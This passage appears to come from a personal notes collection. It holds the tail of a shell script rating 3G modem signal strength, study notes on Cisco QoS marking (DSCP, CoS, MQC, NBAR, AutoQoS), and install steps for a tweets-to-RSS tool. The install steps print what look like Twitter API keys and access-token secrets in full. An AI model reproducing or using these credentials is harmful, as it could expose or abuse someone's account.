elif [ $rssi -gt 19 ] && [ $rssi -le 25 ]; then
        echo "Good ( 19 < RSSI <= 25 )"
elif [ $rssi -gt 13 ] && [ $rssi -le 19 ]; then
        echo "Average ( 13 < RSSI <= 19 )"
elif [ $rssi -gt 7 ] && [ $rssi -le 13 ]; then
        echo "Low ( 7 < RSSI <= 13 )"
elif [ $rssi -gt 0 ] && [ $rssi -le 7 ]; then
        echo "Very low ( 0 < RSSI <= 7 )"
else
        echo "No signal"
fi

$ulsp/sakis3g connect --console > $output
# ./get_rssi
RSSI = 20
Quality = Good ( 19 < RSSI <= 25 )

# Classification and marking


Fields that can be marked for QoS purposes

- IP header
- LAN trunking header
- Frame Relay header
- ATM cell header

IP Precedence and DSCP compared

The IP header is defined in RFC 791, including 1 bytes called Type of Service (ToS).
The ToS was further subdivided, with the high-order 3 bits defined as the IP Precedence (IPP):

- Routine: Precedence 0 - 000
- Priority: Precedence 1 - 001
- Immediate: Precedence 2 - 010
- Flash: Precedence 3 - 011
- Flash Override: Precedence 4 - 100
- Critical: Precedence 5 - 101
- Internetwork Control: Precedence 6 - 110
- Network Control: Precedence 7 - 111

A series of RFC collectively called Differentiated Services (DiffServ) came along later.
The ToS was renamed the Differentiated Services (DS) field, and IPP was replaced with a 6 bits field called the Differentiated Services Code Point (DSCP).

DSCP settings and terminology

Several DiffServ RFCs suggest a set of values to use in the DSCP field and the associated QoS behavior recommended, called Per-Hop Behavior (PHB).

Class selector PHB and DSCP values

IPP overlaps with the first 3 bits of the DSCP.
RFC 2475 defines a set of DSCP values and PHBs, called Class Selector (CS) PHBs, that provide backward compatibility with IPP:

- Default/CS0: 000000 - 000 - Routine
- CS1: 001000 - 001 - Priority
- CS2: 010000 - 010 - Immediate
- CS3: 011000 - 011 - Flash
- CS4: 100000 - 100 - Flash Override
- CS5: 101000 - 101 - Critical
- CS6: 110000 - 110 - Interwork Control
- CS7: 111000 - 111 - Network Control

Packets with larger CS should be given better queuing preference.

Assured Forwarding PHBs and DSCP values

AF defines four classes (1-4) for queuing purposes with tree levels (1-3) of drop probability inside each queue.
Classes with a higher value have a better queuing treatment.
A higher level means a higher probability to being dropped.

- AF11, AF12, AF13: 001010, 001100, 001110
- AF21, AF22, AF23: 010010, 010100, 010110
- AF31, AF32, AF33: 011010, 011100, 011110
- AF41, AF42, AF43: 100010, 100100, 100110

Expedited Forwarding PHB and DSCP values

Packets marked as EF should be given queuing preference so that they experience minimal latency but they should be policed to do not consume all bandwidth on the link or starve other queues.
The DSCP value defined is binary value 101110 (class 5, EF53).

Ethernet LAN Class of Service

Ethernet supports a 3-bit QoS marking field when using either an 802.1q or ISL trunking header.
802.1q defines its QoS field as the 3 most-significant bits of the 2-byte Tag Control field.
ISL defines the 3 least-significant bits from the 1-byte User field.
Generally speaking, these 3 bits are called the Class of Service (CoS).

WAN marking fields

Frame Relay uses the Discard Eligibility (DE) bit. Frames with the DE set to 1 are considered to be dropped.
ATM uses the Cell Loss Priority (CLP) bit. Cells with the CLP set to 1 are considered to be dropped.
MPLS uses the a 3-bit field called Experimental (EXP) for general QoS marking.

Locations for marking and matching

For IPP and DSCP on edge devices.
For CoS, DE, CLP and EXP:

- For classification: on ingress interfaces.
- For marking: on egress interfaces.

Cisco Modular QoS CLI

MQC is a common set of configuration commands to configure many QoS features in a router or switch.
MQC-based tools can be identified by the name, they all begin with the phrase "Class-Based" (CB):

- CB Marking
- CB Weighted Fair Queuing (CBWFQ)
- CB Policing
- CB Shaping
- CB Header Compression

Mechanics of MQC

There are three major commands with MQC:

- The class-map command defines the matching parameters.
- The PHB actions (marking, queuing, ...) are configured under the policy-map.
- The policy map is enabled on an interface by using a service-policy command.

Classification using class maps

- The match command has many options for matching packets (QoS fields, ACLs, MACs, ...).
- Class-map names are case sensitive.
- The match protocol command means that IOS uses Network Based Application Recognition (NBAR) to perform the match.
- The match any command matches any packet.
- CEF is required for CB Marking.
ip cef
class-map match-all myclass1
 match ip rtp 16384 16383 ! (16384-32767)
class-map match-all myclass2
 match any
policy-map mypolicy
 class myclass1
  set dscp EF
 class myclass2
  set dscp default
interface fa0/0
 service-policy output mypolicy
Using multiple match commands

- Up to four (CoS and IPP) or eight (DSCP) values can be listed on a single match cos, match precedence or match dscp.
- If a class map has multiple match commadns in it, the match-any or match-all (default) define a logical OR or a logical AND between the match commands.
- The match class _name_ command refers to another class map by name.

Classification using NBAR

NBAR can look past the UDP and TCP header and refer to the host name, URL or MIME type in HTTP requests.
You can upgrade NBAR without changing to a later IOS version. Cisco uses a feature called Packet Description Language Modules (PDLM) to define new protocolos that NBAR should match:
ip nbar pdlm _pdlm-name_

Class-Based Marking (CB Marking) configuration

- A CB Marking policy map is processed sequentially; one a packet has matched a class, it is marked based on the set commands.
- You can configure multiple set commands in one class to set multiple fields.
- Packets that do not explicity match a defined class are considered to have matched a special class called class-default.
- For any class inside the policy map for which there is no set command, packets in that class are not marked.

- set [ip] precedence _value_
- set [ip] dscp _value_
- set cos _value_
- set qos-group _id_ ! Marks the group identifier for the QoS group
- set atm-clp
- set fr-de

CB Marking design choises

Mark as close to the ingress edge of the network as possible but not so close to the edge that the marking is made by an untrusted device.
RFC-recomended values for marking CoS, IPP, DSCP:

- Voice payload: 5, 5, EF
- Video payload: 4, 4, AF41
- Voice/video signaling: 3, 3, CS3
- Mission-critical data: 3, 3, AF31/AF32/AF33
- Transactional data: 2, 2, AF21/AF22/AF23
- Bulk data: 1, 1, AF11/AF12/AF13
- Best effort: 0, 0, BE
- Scavenger: 0, 0, 2/4/6

QoS pre-classification

With VPN traffic, the only thing we have to work with is the ToS byte of the original packet, which is automatically copied to the tunnel header (IPsec transport mode, IPsec tunnel mode and GRE).
But features like NBAR are broken.
Cisco IOS includes a feature called QoS pre-classification that can be enabled on VPN endpoint routers that keep the original traffic in memory until the egress QoS actions is taken:

- GRE and IPIP: interface tunnel
- L2F and L2TP: interface virtual-template
- IPsec: crypto map

AutoQoS

Is a macro that helps automate class-based Qos configuration using best practice recommendations.
There are two flavors: AutoQoS for VoIP and for the Enterprise.
To verify AutoQoS configuration use:

- show auto qos
- show mls qos
- show policy-map interface
- show auto discovery qos

AutoQoS for VoIP

Provides QoS both global and interface configuration for voice and video applications.
Is supported on routers and switches.
When enabled on access ports, AutoQoS uses CDP to detect the presence of a Cisco phone or softphone:
- auto qos voip {cisco-phone | cisco-softphone}
- Normal traffic is treated as best effort.
- For phone traffic, the switch trusts the QoS markings it receives.
When enabled on a trunk or uplink, it trusts the CoS or DSCP values received:
- auto qos voip trust

AutoQoS for the Enterprise

Provides QoS both global and interface configuration for voice, video and other network applications.
Is supported on routers.
The command to enable traffic discovery is auto discovery qos [trust] and is configured at the interface, DLCI or PVC level.
Use the trust keyword if you trust the traffic already marked because AutoQoS policies will use those markings during the configuration stage.
The router will classify the traffic collected into one of ten classes:

- Routing: CS6 - EIGRP, OSPF
- VoIP: EF - RTP voice media
- Interactive video: AF41 - RTP video media
- Streaming video: CS4 - Real audio, Netshow
- Control: CS3 - RTCP, H323, SIP
- Transactional: AF21 - SAP, Citrix, Telnet, SSH
- Bulk: AF11 - FTP, SMTP, POP3, Exchange
- Scavenger: CS1 - P2P applications
- Management: CS2 - SNMP, Syslog, DHCP, DNS
- Best effort: All others - All others.

Finally, configure the auto qos command and disable the traffic discovery.

# Tweets to RSS


# apt-get install curl apache2 php5 php5-curl
# url="https://github.com/chrissimpkins/tweetledee/archive/master.zip"
# curl --silent --output tweetledee-master.zip --location $url
# unzip tweetledee-master.zip
# mv tweetledee-master/tweetledee /var/www/.
# # Subscribe an application at https://dev.twitter.com/apps/new
# grep ^.my /var/www/tweetledee/tldlib/keys/tweetledee_keys.php
$my_consumer_key        = '39BeFubG4VQf9XroLGp7Ge';
$my_consumer_secret     = 'svgWXQMWylp8gIIuAc2fPoocIbQcPrBV2LMEj9UYBAU';
$my_access_token        = 'TJJUz9vEsh5rJYsF+2Lcke9yMLVNwrZ8lU11cG5T9ofjWR0R75';
$my_access_token_secret = 'rTEGm4QlcKDhbMnWU5Bsqkrb7teCtQwCE2RPM6JTMh';
$my_domain              = 'ENTER YOUR DOMAIN NAME';
# curl --silent http://127.0.0.1/tweetledee/homerss.php
# curl --silent http://127.0.0.1/tweetledee/userrss.php?user=at1as